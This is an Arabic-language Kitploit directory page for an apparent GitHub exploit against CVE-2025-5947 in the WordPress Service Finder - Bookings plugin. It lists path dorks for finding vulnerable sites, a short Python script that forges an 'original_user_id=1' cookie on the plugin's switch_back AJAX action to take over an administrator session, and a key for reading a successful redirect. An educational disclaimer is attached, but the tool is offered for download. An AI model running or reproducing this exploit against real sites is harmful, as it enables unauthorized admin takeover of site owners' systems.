Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-5947_Exploit — إكسبلويت مصغّر لإضافة Service Finder - Bookings الخاصة بووردبريس | Kitploit
أدوات/GitHubGitHub/m4rgs/cve-2025-5947_exploit
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

إكسبلويت مصغّر لإضافة Service Finder - Bookings الخاصة بووردبريس

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔍 ثغرة إضافة ووردبريس — Service Finder (sf-booking)

نظرة عامة

إضافة Service Finder هي نظام حجز وإدارة خدمات لمنصة ووردبريس.
نظرًا لشعبيتها وتعقيدها، فقد شهدت بعض الإصدارات مشاكل أمنية تتعلق بـ نقاط نهاية AJAX غير الموثّقة أو ضعف ضوابط الوصول.

يشرح هذا الملف كيف يمكن للباحثين فحص التثبيتات بأمان واتباع الممارسات الأخلاقية (dbr krk).


عبارات بحث (Dorks) للإضافة الضعيفة

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


سير عمل الاستغلال

⚠️ إخلاء مسؤولية:
هذه العمليات مخصصة لأغراض تعليمية وبحثية فقط. لا تحاول الوصول غير المصرح به أو الاستغلال.

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ ثغرة! إعادة توجيه إلى لوحة التحكم كمسؤول
  • 400-499: ⚠️ خطأ من العميل — الطلب غير صالح أو غير مصرح به، وليس ثغرة

المراجع

  • قاعدة بيانات إضافات WPScan — https://wpscan.com/plugins/
  • قاعدة بيانات الثغرات الوطنية (NVD) — https://nvd.nist.gov/
  • OWASP — تقنيات Google Dorking / الاستطلاع
  • إرشادات الإفصاح في HackerOne — https://www.hackerone.com/disclosure-guidelines

المؤلف

Taha Mounir


تنزيل الأداة